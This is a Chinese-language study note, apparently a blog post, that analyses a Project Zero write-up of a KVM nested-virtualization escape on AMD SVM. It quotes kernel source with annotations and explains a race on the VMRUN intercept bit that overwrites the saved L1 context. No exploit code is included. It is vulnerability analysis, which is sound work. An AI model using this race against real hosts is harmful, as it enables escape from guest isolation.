KVM 逃逸漏洞 From Project Zero

Overview

主要参考链接

初衷

由于过去KVM逃逸的漏洞大多是因为user态下的qemu的问题造成的,很少有KVM自身的代码有漏洞。

前置知识

  • AMD的虚拟化扩展成为SVM,其中重要的一个指令是VMRUN,该指令有一个隐式的参数:运行该指令时RAX寄存器指向了页对齐的VMCB的物理地址(在intel中叫VMCS)。
  • 虚拟化和嵌套虚拟化的知识在别的文章里有讲。
  • 大部分的嵌套虚拟化的代码都在 arch/x86/kvm/svm/nested.c中,KVM拦截VMRUN指令的实现在函数nested_svm_vmrun:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
int nested_svm_vmrun(struct vcpu_svm *svm) //struct vcpu_svm是vcpu的结构体
{
int ret;
struct vmcb *vmcb12;//vmcb12指的是guest hypervisor创建的的结构体,L1为了运行L2用的
struct vmcb *hsave = svm->nested.hsave;//vmcb12的hsave,即L1的状态
struct vmcb *vmcb = svm->vmcb;//与当前运行的vcpu绑定的vmcb结构体 vmcb01
struct kvm_host_map map; //负责将GPA转换成HPA的map
u64 vmcb12_gpa;


vmcb12_gpa = svm->vmcb->save.rax; ** 1 ** //L1中的GPA,该GPA用于存放vmcb12结构体。
ret = kvm_vcpu_map(&svm->vcpu, gpa_to_gfn(vmcb12_gpa), &map); ** 2 **//利用之前的map完成地址转换

ret = kvm_skip_emulated_instruction(&svm->vcpu);

vmcb12 = map.hva;//并把HPA映射到HVA上,保证KVM能够直接访问

if (!nested_vmcb_checks(svm, vmcb12)) { ** 3 ** //一旦映射完成就开始检查vmcb12的内容
vmcb12->control.exit_code = SVM_EXIT_ERR;
vmcb12->control.exit_code_hi = 0;
vmcb12->control.exit_info_1 = 0;
vmcb12->control.exit_info_2 = 0;
goto out;
}

...

/*
* Save the old vmcb, so we don't need to pick what we save, but can
* restore everything when a VMEXIT occurs
*/
//把vmcb01的guest state存入vmcb12的host
hsave->save.es = vmcb->save.es;
hsave->save.cs = vmcb->save.cs;
hsave->save.ss = vmcb->save.ss;
hsave->save.ds = vmcb->save.ds;
hsave->save.gdtr = vmcb->save.gdtr;
hsave->save.idtr = vmcb->save.idtr;
hsave->save.efer = svm->vcpu.arch.efer;
hsave->save.cr0 = kvm_read_cr0(&svm->vcpu);
hsave->save.cr4 = svm->vcpu.arch.cr4;
hsave->save.rflags = kvm_get_rflags(&svm->vcpu);
hsave->save.rip = kvm_rip_read(&svm->vcpu);
hsave->save.rsp = vmcb->save.rsp;
hsave->save.rax = vmcb->save.rax;
if (npt_enabled)
hsave->save.cr3 = vmcb->save.cr3;
else
hsave->save.cr3 = kvm_read_cr3(&svm->vcpu);
copy_vmcb_control_area(&hsave->control, &vmcb->control);
svm->nested.nested_run_pending = 1;
//进入L2的函数,
if (enter_svm_guest_mode(svm, vmcb12_gpa, vmcb12)) ** 4 **
goto out_exit_err;
if (nested_svm_vmrun_msrpm(svm))
goto out;
out_exit_err:
svm->nested.nested_run_pending = 0;
svm->vmcb->control.exit_code = SVM_EXIT_ERR;
svm->vmcb->control.exit_code_hi = 0;
svm->vmcb->control.exit_info_1 = 0;
svm->vmcb->control.exit_info_2 = 0;
nested_svm_vmexit(svm);
out:
kvm_vcpu_unmap(&svm->vcpu, &map, true);
return ret;
}
  • 进入从L0进入L1的函数是enter_svm_guest_mode,这里还是L0的上下文
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
int enter_svm_guest_mode(struct vcpu_svm *svm, u64 vmcb12_gpa,
struct vmcb *vmcb12)
{
int ret;
svm->nested.vmcb12_gpa = vmcb12_gpa; //把vmcb12_gpa(这里是从L0视角来看的vmcb12)赋值给svm中相应的结构

//这里把vmcb12的control area直接赋值给svm->nest.ctl,(这里的SVM是vmcb02)但是这里有个问题,前面是check过的,但是这里使用并没有check(博客里是这么说的)
load_nested_vmcb_control(svm, &vmcb12->control);//貌似5.11的源码还没这一行,不知道为什么博客里给了这一行
nested_prepare_vmcb_save(svm, vmcb12);//5.11源码里这里将vmcb12赋值给svm->vmcb->save.*
nested_prepare_vmcb_control(svm);//5.11源码里将svm->nested.ctl赋值给svm->vmcb->control。。并把VCPU进入guest模式,准备进入L2。

ret = nested_svm_load_cr3(&svm->vcpu, vmcb12->save.cr3,
nested_npt_enabled(svm));
if (ret)
return ret;

svm_set_gif(svm, true);//global interrupt flag

return 0;
}

static void load_nested_vmcb_control(struct vcpu_svm *svm,
struct vmcb_control_area *control)
{
copy_vmcb_control_area(&svm->nested.ctl, control);
...
}


BUG

上面说明了在函数enter_svm_guest_mode中,因为在赋值时候没有double check,导致的bug,那么如何利用这个bug呢,首先我们先看看函数nested_vmcb_check_controls做了哪些检查:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
static bool nested_vmcb_check_controls(struct vmcb_control_area *control)
{
if ((vmcb_is_intercept(control, INTERCEPT_VMRUN)) == 0)
return false;

if (control->asid == 0)//asid用于区分不同虚拟机的地址空间
return false;

if ((control->nested_ctl & SVM_NESTED_CTL_NP_ENABLE) &&
!npt_enabled)//嵌套虚拟化控制
return false;

return true;
}

第一次检查中,检查VMRUN指令是否可以被截断,但是SVM的VMCB中包含了一个bit用来控制guest中运行VMRUN是否可以被截断,并且清除这个位会导致VMExit的发生(因为他不被硬件支持)。所以我们可以通过竞争的方式,在多核系统上不断反复翻转这个bit,就可能会导致问题的产生。

既然设置这个bit会导致VMexit,那我们先来看看KVM中VMexit的处理函数:handle_exit in arch/x86/kvm/svm.c,每次退出时候都要判断该退出原因是由L0处理还是L1的hypervisor处理。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
 static int handle_exit(struct kvm_vcpu *vcpu, fastpath_t exit_fastpath)
{
struct vcpu_svm *svm = to_svm(vcpu);
struct kvm_run *kvm_run = vcpu->run;
u32 exit_code = svm->vmcb->control.exit_code;



if (is_guest_mode(vcpu)) {//判断是L1的vcpu发生exit还是L0的vcpu发生exit,即是从L2退出到L0还是从L1退出到L0。如果为真则是L2退出。
int vmexit;

trace_kvm_nested_vmexit(exit_code, vcpu, KVM_ISA_SVM);

vmexit = nested_svm_exit_special(svm);//如果退出原因是中断或者别的特殊原因(INTR,NMI,NPF),就先L0处理,然后return NESTED_EXIT_HOST,否则return NESTED_EXIT_CONTINUE,由L1接着处理。

//L1的hypervisor处理
if (vmexit == NESTED_EXIT_CONTINUE)
vmexit = nested_svm_exit_handled(svm); //进入处理L0要干的一些事情,如果要注入

if (vmexit == NESTED_EXIT_DONE)//用于处理nested_svm_exit_special中处理过了的vmexit,因为在nested_svm_exit_handled中处理的在该函数中自己已经返回guest运行了
return 1;
}
}


int nested_svm_exit_handled(struct vcpu_svm *svm)
{
int vmexit;

vmexit = nested_svm_intercept(svm); //调用nested_svm_intercept查看exit是否需要处理,如果要L1处理则返回NESTED_EXIT_DONE,否则返回NESTED_EXIT_HOST。

if (vmexit == NESTED_EXIT_DONE)
nested_svm_vmexit(svm); //将相应的内容写入vmcb12中,然后恢复guest运行,通过enter_svm_guest_mode函数恢复运行。

return vmexit;
}


static int nested_svm_intercept(struct vcpu_svm *svm)
{
// exit_code==INTERCEPT_VMRUN when the L2 guest executes vmrun
u32 exit_code = svm->vmcb->control.exit_code;
int vmexit = NESTED_EXIT_HOST;
switch (exit_code) {
case SVM_EXIT_MSR:
vmexit = nested_svm_exit_handled_msr(svm);
break;
case SVM_EXIT_IOIO:
vmexit = nested_svm_intercept_ioio(svm);
break;

default: {
if (vmcb_is_intercept(&svm->nested.ctl, exit_code))
//判断svm->nested.ctl是否为1.而且这是default的情况,通常情况下都会为1,并且返回NESTED_EXIT_DONE.
vmexit = NESTED_EXIT_DONE;
}
}

return vmexit;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
int nested_svm_vmexit(struct vcpu_svm *svm)
{
int rc;
struct vmcb *vmcb12;
struct vmcb *hsave = svm->nested.hsave;
struct vmcb *vmcb = svm->vmcb;
struct kvm_host_map map;

rc = kvm_vcpu_map(&svm->vcpu, gpa_to_gfn(svm->nested.vmcb12_gpa), &map);
if (rc) {
if (rc == -EINVAL)
kvm_inject_gp(&svm->vcpu, 0);
return 1;
}

vmcb12 = map.hva;//将VMCB12映射到L0,使得L0能够直接访问

/* Exit Guest-Mode */
leave_guest_mode(&svm->vcpu);
svm->nested.vmcb12_gpa = 0;
WARN_ON_ONCE(svm->nested.nested_run_pending);

kvm_clear_request(KVM_REQ_GET_NESTED_STATE_PAGES, &svm->vcpu);

/* in case we halted in L2 */
svm->vcpu.arch.mp_state = KVM_MP_STATE_RUNNABLE;

/* Give the current vmcb to the guest */

vmcb12->save.es = vmcb->save.es;
vmcb12->save.cs = vmcb->save.cs;
vmcb12->save.ss = vmcb->save.ss;
vmcb12->save.ds = vmcb->save.ds;
vmcb12->save.gdtr = vmcb->save.gdtr;
vmcb12->save.idtr = vmcb->save.idtr;
vmcb12->save.efer = svm->vcpu.arch.efer;
vmcb12->save.cr0 = kvm_read_cr0(&svm->vcpu);
vmcb12->save.cr3 = kvm_read_cr3(&svm->vcpu);
vmcb12->save.cr2 = vmcb->save.cr2;
vmcb12->save.cr4 = svm->vcpu.arch.cr4;
vmcb12->save.rflags = kvm_get_rflags(&svm->vcpu);
vmcb12->save.rip = kvm_rip_read(&svm->vcpu);
vmcb12->save.rsp = kvm_rsp_read(&svm->vcpu);
vmcb12->save.rax = kvm_rax_read(&svm->vcpu);
vmcb12->save.dr7 = vmcb->save.dr7;
vmcb12->save.dr6 = svm->vcpu.arch.dr6;
vmcb12->save.cpl = vmcb->save.cpl;

vmcb12->control.int_state = vmcb->control.int_state;
vmcb12->control.exit_code = vmcb->control.exit_code;
vmcb12->control.exit_code_hi = vmcb->control.exit_code_hi;
vmcb12->control.exit_info_1 = vmcb->control.exit_info_1;
vmcb12->control.exit_info_2 = vmcb->control.exit_info_2;

if (vmcb12->control.exit_code != SVM_EXIT_ERR)
nested_vmcb_save_pending_event(svm, vmcb12);

if (svm->nrips_enabled)
vmcb12->control.next_rip = vmcb->control.next_rip;

vmcb12->control.int_ctl = svm->nested.ctl.int_ctl;
vmcb12->control.tlb_ctl = svm->nested.ctl.tlb_ctl;
vmcb12->control.event_inj = svm->nested.ctl.event_inj;
vmcb12->control.event_inj_err = svm->nested.ctl.event_inj_err;

vmcb12->control.pause_filter_count =
svm->vmcb->control.pause_filter_count;
vmcb12->control.pause_filter_thresh =
svm->vmcb->control.pause_filter_thresh;

/* Restore the original control entries */
copy_vmcb_control_area(&vmcb->control, &hsave->control);

/* On vmexit the GIF is set to false */
svm_set_gif(svm, false);

svm->vmcb->control.tsc_offset = svm->vcpu.arch.tsc_offset =
svm->vcpu.arch.l1_tsc_offset;

svm->nested.ctl.nested_cr3 = 0;

/* Restore selected save entries */
svm->vmcb->save.es = hsave->save.es;
svm->vmcb->save.cs = hsave->save.cs;
svm->vmcb->save.ss = hsave->save.ss;
svm->vmcb->save.ds = hsave->save.ds;
svm->vmcb->save.gdtr = hsave->save.gdtr;
svm->vmcb->save.idtr = hsave->save.idtr;
kvm_set_rflags(&svm->vcpu, hsave->save.rflags);
svm_set_efer(&svm->vcpu, hsave->save.efer);
svm_set_cr0(&svm->vcpu, hsave->save.cr0 | X86_CR0_PE);
svm_set_cr4(&svm->vcpu, hsave->save.cr4);
kvm_rax_write(&svm->vcpu, hsave->save.rax);
kvm_rsp_write(&svm->vcpu, hsave->save.rsp);
kvm_rip_write(&svm->vcpu, hsave->save.rip);
svm->vmcb->save.dr7 = 0;
svm->vmcb->save.cpl = 0;
svm->vmcb->control.exit_int_info = 0;

vmcb_mark_all_dirty(svm->vmcb);

trace_kvm_nested_vmexit_inject(vmcb12->control.exit_code,
vmcb12->control.exit_info_1,
vmcb12->control.exit_info_2,
vmcb12->control.exit_int_info,
vmcb12->control.exit_int_info_err,
KVM_ISA_SVM);

kvm_vcpu_unmap(&svm->vcpu, &map, true);

nested_svm_uninit_mmu_context(&svm->vcpu);

rc = nested_svm_load_cr3(&svm->vcpu, hsave->save.cr3, false);
if (rc)
return 1;

if (npt_enabled)
svm->vmcb->save.cr3 = hsave->save.cr3;

/*
* Drop what we picked up for L2 via svm_complete_interrupts() so it
* doesn't end up in L1.
*/
svm->vcpu.arch.nmi_injected = false;
kvm_clear_exception_queue(&svm->vcpu);
kvm_clear_interrupt_queue(&svm->vcpu);

return 0;
}

However, if the L1 guest exploited the race condition described above svm->nested.ctl won’t have the INTERCEPT_VMRUN bit set and the VM exit will be handled by KVM itself. This results in a second call to nested_svm_vmrun while still running inside the L2 guest context. nested_svm_vmrun isn’t written to handle this situation and will blindly overwrite the L1 context stored in svm->nested.hsave with data from the currently active svm->vmcb which contains data for the L2 guest: